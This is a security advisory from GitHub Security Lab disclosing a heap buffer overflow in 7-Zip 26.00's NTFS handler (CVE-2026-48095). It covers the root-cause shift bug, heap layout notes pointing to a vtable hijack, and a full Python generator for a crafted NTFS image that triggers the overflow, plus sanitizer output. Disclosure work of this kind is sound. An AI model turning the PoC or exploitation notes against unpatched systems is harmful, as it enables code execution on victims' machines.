GHSL-2026-140: Heap Buffer Write Overflow in 7-Zip

Coordinated Disclosure Timeline

2026-04-24: The report was delivered as a sourceforge private issue.
2026-04-27: v26.01 with a fix was released.

Summary

A heap buffer overflow vulnerability (GHSL-2026-140) exists in 7-Zip version 26.00, caused by an under-allocation in the NTFS compressed stream buffer (GetCuSize shift UB), potentially allowing attackers to exploit this issue for arbitrary code execution or application crashes.

Project

7-Zip

Tested Version

v26.00

Details

Heap buffer overflow via NTFS compressed stream buffer under-allocation (`GetCuSize` shift UB) (`GHSL-2026-140`)

A heap buffer overflow vulnerability exists in the NTFS archive handler in 7-Zip that can lead to code execution via vtable hijack. The CInStream::GetCuSize() function computes the NTFS compression-unit buffer size using a 32-bit shift (UInt32)1 << (BlockSizeLog + CompressionUnit). When an attacker-crafted NTFS image sets ClusterSizeLog >= 28 (accepted by the parser) and a compressed data attribute with CompressionUnit == 4, the shift exponent reaches 32 — undefined behavior in C++. On both x86 and x64, the UB causes _inBuf to be allocated as 1 byte. The subsequent ReadStream_FALSE writes 256 MB of attacker-controlled data into this 1-byte buffer.

The NTFS boot sector parser accepts cluster sizes up to 2^30 bytes (CPP/7zip/Archive/NtfsHandler.cpp, line 133):

// NtfsHandler.cpp, lines 122-134
const unsigned v = p[13];
if (v <= 0x80)
{
  const int t = GetLog(v);
  if (t < 0) return false;
  sectorsPerClusterLog = (unsigned)t;
}
else
  sectorsPerClusterLog = 0x100 - v;
ClusterSizeLog = SectorSizeLog + sectorsPerClusterLog;
if (ClusterSizeLog > 30)        // allows 28, 29, 30
  return false;

Non-resident compressed data attributes carry CompressionUnit from the attacker-controlled attribute header (NtfsHandler.cpp:509). The value CompressionUnit == 4 is explicitly accepted (NtfsHandler.cpp:430).

The compressed stream’s buffer size is computed as:

// NtfsHandler.cpp, line 687
UInt32 GetCuSize() const { return (UInt32)1 << (BlockSizeLog + CompressionUnit); }

When BlockSizeLog == 28 and CompressionUnit == 4, the exponent is 32 — undefined behavior (shift by >= type width). On x86, (UInt32)1 << 32 typically yields 1 due to hardware masking of shift counts.

The undersized buffer is then used:

// NtfsHandler.cpp, lines 695-697
UInt32 cuSize = GetCuSize();     // UB → 1 byte on x86/x64
_inBuf.Alloc(cuSize);           // allocates 1 byte
_outBuf.Alloc(kNumCacheChunks << _chunkSizeLog);  // x86: 2 bytes; x64: 8 GB (succeeds on >= 16 GB RAM)

NTFS uses LZNT1 compression. The two buffers serve a standard decompress pipeline:

_inBuf — holds raw compressed data read from disk (via ReadStream_FALSE)
_outBuf — holds decompressed output from Lznt1Dec(), also used as a read cache

The normal flow is: disk → _inBuf → Lznt1Dec() → _outBuf → memcpy to caller. Both buffers should be GetCuSize() bytes (one compression unit). Due to the shift UB, _inBuf gets 1 byte instead of the intended size, so the very first step — reading compressed data from disk into _inBuf — overflows:

// NtfsHandler.cpp, lines 940-941
const size_t compressed = (size_t)numChunks << BlockSizeLog;  // up to 256 MB
RINOK(ReadStream_FALSE(Stream, _inBuf + offs, compressed))    // writes into 1-byte buffer

Note that the overflow target is _inBuf, not _outBuf. On x64, even when the 8 GB _outBuf allocation succeeds, the 1-byte _inBuf is still overflowed because both buffer sizes are computed independently from the same UB shift result.

Platform-dependent behavior

On 32-bit builds, (size_t)2 << 32 is also UB (size_t is 32-bit), yielding 2 via hardware masking. Both _inBuf.Alloc(1) and _outBuf.Alloc(2) succeed with tiny allocations, and the heap overflow is unconditionally reached.

On 64-bit builds, (size_t)2 << 32 is a valid 64-bit shift yielding 8,589,934,592 (8 GB). The _outBuf.Alloc(8 GB) call succeeds on systems with sufficient RAM (confirmed on a 64 GB machine). After the allocation succeeds, execution proceeds to ReadStream_FALSE and the same heap overflow occurs. On low-memory systems, the allocation may fail with CNewException, limiting the impact to DoS.

Impact

Heap buffer overflow leading to vtable hijack (potential code execution) — 256 MB written into a 1-byte heap buffer. ReadStream_FALSE calls stream->Read() in a loop (64 KB per iteration via kBlockSize). Debugger analysis on a release /O1 build (identical codegen to official binary) shows the stream object (CInStream) is allocated only 304 bytes (0x130) after _inBuf on the heap. The first Read() iteration writes 64 KB of attacker-controlled data starting at _inBuf, overwriting the stream object’s vtable pointer after just 304 bytes. The second Read() iteration dispatches through the corrupted vtable — a classic vtable hijack. The attacker controls the written data (NTFS cluster content from the crafted image), so they control the overwritten vtable pointer.
Both x86 and x64 builds are affected. On x64, the overflow is reached on any system where the 8 GB _outBuf allocation succeeds (common on modern systems with >= 16 GB RAM).
On Windows, ReadFile fails if it detects an unmapped or guard page in the destination range before copying the controlled bytes. Attackers may need Heap Feng Shui to place _inBuf so the overwrite reaches adjacent objects without immediately faulting.
The NTFS handler is enabled in stock 7z.dll and is registered for .ntfs and .img extensions. However, 7-Zip uses signature-based fallback detection: when the format matching the file extension fails to open, all remaining handlers are tried in signature-priority order. Because the NTFS handler matches on the "NTFS " signature at byte offset 3 (REGISTER_ARC_I in NtfsHandler.cpp:2889), a crafted NTFS image with any file extension — including .7z, .zip, .rar, or no extension at all — will be opened by the NTFS handler after the extension-matched handler rejects it. This means the attack surface is not limited to files with NTFS-associated extensions.
Triggers during extraction/testing of a compressed file from the crafted image.
No user interaction beyond opening the crafted image.

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H — 8.8 (High)

Affected versions: The GetCuSize() computation has been present since NTFS compressed stream support was introduced. All versions through 26.00 are affected.

CWEs

CWE-787: “Out-of-bounds Write”
CWE-190: “Integer Overflow or Wraparound”

Resources

PoC generator (gen_ntfs_sparse.py) — generates poc_ntfs_sparse.ntfs (512 MB sparse NTFS image, ~8 KB actual data):

#!/usr/bin/env python3
"""Generate a sparse NTFS image with ClusterSizeLog=28 and a compressed
$DATA attribute with CompressionUnit=4 to trigger GetCuSize() UB."""
import struct, os, sys

boot = bytearray(512)
boot[0:3] = b'\xEB\x52\x90'
boot[3:11] = b'NTFS    '
struct.pack_into('<H', boot, 11, 512)
boot[13] = 0xED  # ClusterSizeLog = 28
for i in range(14, 21): boot[i] = 0
boot[21] = 0xF8
struct.pack_into('<H', boot, 24, 63)
struct.pack_into('<H', boot, 26, 255)
struct.pack_into('<Q', boot, 40, 2 << 19)  # TotalSectors
struct.pack_into('<Q', boot, 48, 1)  # MftCluster=1 -> offset 256MB
boot[64] = 0xF6
boot[68] = 0xF6
struct.pack_into('<Q', boot, 72, 0x1234567890ABCDEF)
boot[510] = 0x55; boot[511] = 0xAA

MFT_REC = 1024

def mft_rec(seq, flags, attrs, rec_num=0):
    r = bytearray(MFT_REC)
    r[0:4] = b'FILE'
    struct.pack_into('<H', r, 4, 0x30)   # UpdateSequenceOffset
    struct.pack_into('<H', r, 6, 3)      # UpdateSequenceSize
    struct.pack_into('<Q', r, 8, 0)
    struct.pack_into('<H', r, 16, seq)
    struct.pack_into('<H', r, 18, 1)
    struct.pack_into('<H', r, 20, 0x38)
    struct.pack_into('<H', r, 22, flags)
    bytes_in_use = (0x38 + len(attrs) + 8 + 7) & ~7
    struct.pack_into('<I', r, 24, bytes_in_use)
    struct.pack_into('<I', r, 28, MFT_REC)
    struct.pack_into('<I', r, 0x2C, rec_num)
    r[0x38:0x38+len(attrs)] = attrs
    struct.pack_into('<I', r, 0x38+len(attrs), 0xFFFFFFFF)
    usn = 0x0001
    struct.pack_into('<H', r, 0x30, usn)
    orig0 = struct.unpack_from('<H', r, 510)[0]
    orig1 = struct.unpack_from('<H', r, 1022)[0]
    struct.pack_into('<H', r, 0x32, orig0)
    struct.pack_into('<H', r, 0x34, orig1)
    struct.pack_into('<H', r, 510, usn)
    struct.pack_into('<H', r, 1022, usn)
    return r

def std_info():
    d = bytearray(48)
    a = bytearray(24 + len(d))
    struct.pack_into('<I', a, 0, 0x10)
    struct.pack_into('<I', a, 4, len(a))
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(d))
    a[24:24+len(d)] = d
    return a

def filename(name):
    nu = name.encode('utf-16-le')
    fn = bytearray(66 + len(nu))
    struct.pack_into('<Q', fn, 0, 5)
    fn[64] = len(name)
    fn[65] = 3
    fn[66:66+len(nu)] = nu
    raw_len = 24 + len(fn)
    padded_len = (raw_len + 7) & ~7
    a = bytearray(padded_len)
    struct.pack_into('<I', a, 0, 0x30)
    struct.pack_into('<I', a, 4, padded_len)
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(fn))
    a[24:24+len(fn)] = fn
    return a

def compressed_data():
    rl = bytes([0x11, 0x01, 0x01, 0x00])  # 1 cluster at LCN 1
    hdr_size = 0x48
    sz = (hdr_size + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 0x10, 0)     # LowVcn
    struct.pack_into('<Q', a, 0x18, 0)     # HighVcn
    struct.pack_into('<H', a, 0x20, hdr_size)  # RunlistOffset
    a[0x22] = 4                            # CompressionUnit = 4
    cs = 1 << 28
    struct.pack_into('<Q', a, 0x28, cs)    # AllocatedSize
    struct.pack_into('<Q', a, 0x30, 100)   # Size
    struct.pack_into('<Q', a, 0x38, 100)   # InitializedSize
    struct.pack_into('<Q', a, 0x40, cs)    # PackSize
    a[hdr_size:hdr_size+len(rl)] = rl
    return a

def mft_data_attr(num_records):
    rl = bytes([0x11, 0x01, 0x01, 0x00])
    sz = (72 + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 16, 0)
    struct.pack_into('<Q', a, 24, 0)
    struct.pack_into('<H', a, 32, 0x40)
    struct.pack_into('<H', a, 34, 0)       # CompressionUnit = 0
    data_size = num_records * MFT_REC
    struct.pack_into('<Q', a, 40, 1 << 28)
    struct.pack_into('<Q', a, 48, data_size)
    struct.pack_into('<Q', a, 56, data_size)
    a[0x40:0x40+len(rl)] = rl
    return a

num_mft_records = 7
mft  = mft_rec(1, 1, std_info() + mft_data_attr(num_mft_records), rec_num=0)
for i in range(1, 5):
    mft += mft_rec(i+1, 1, std_info(), rec_num=i)
mft += mft_rec(1, 3, std_info(), rec_num=5)  # root dir
mft += mft_rec(1, 1, std_info() + filename("test.txt") + compressed_data(), rec_num=6)

mft_off = 1 << 28   # 256 MB
phy_size = 2 << 28   # 512 MB
out = sys.argv[1] if len(sys.argv) > 1 else "poc_ntfs_sparse.ntfs"
with open(out, 'wb') as f:
    f.write(boot)
    f.seek(mft_off)
    f.write(mft)
    f.seek(phy_size - 1)
    f.write(b'\x00')

print(f"Generated: {out} ({os.stat(out).st_size} bytes apparent)")

Usage: python3 gen_ntfs_sparse.py [output_path]

The PoC constructs a hand-crafted NTFS image with ClusterSizeLog = 28 (256 MB clusters), 7 MFT records at offset 256 MB, and a compressed $DATA attribute with CompressionUnit = 4. No existing NTFS formatting tool (mkntfs) supports clusters larger than 64 KB, so the entire MFT structure is synthesized from scratch with correct:

Boot sector with SectorsPerCluster = 0xED (negative encoding for ClusterSizeLog = 28)
USN fixup arrays at sector boundaries
8-byte-aligned attribute records ($STANDARD_INFORMATION, $FILE_NAME, $DATA)
Non-resident $DATA runlists within NumClusters bounds
Compressed attribute header with PackSize field at offset 0x40

Verification

Confirmed with UBSan.

UBSan (clang, Linux x64, recovery mode)

Confirms the root-cause shift UB regardless of platform:

../../Archive/NtfsHandler.cpp:687:47: runtime error: shift exponent 32 is too large
    for 32-bit type 'UInt32' (aka 'unsigned int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior
    ../../Archive/NtfsHandler.cpp:687:47

After the UB, cascading corruption leads to a SEGV:

../../Common/StreamUtils.cpp:62:27: runtime error: member call on address 0x5d3dd8f776f0
    which does not point to an object of type 'ISequentialInStream'
    note: object has invalid vptr
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==60==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000018
==60==Hint: address points to the zero page.

CVE

CVE-2026-48095

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2026-140 in any communication regarding this issue.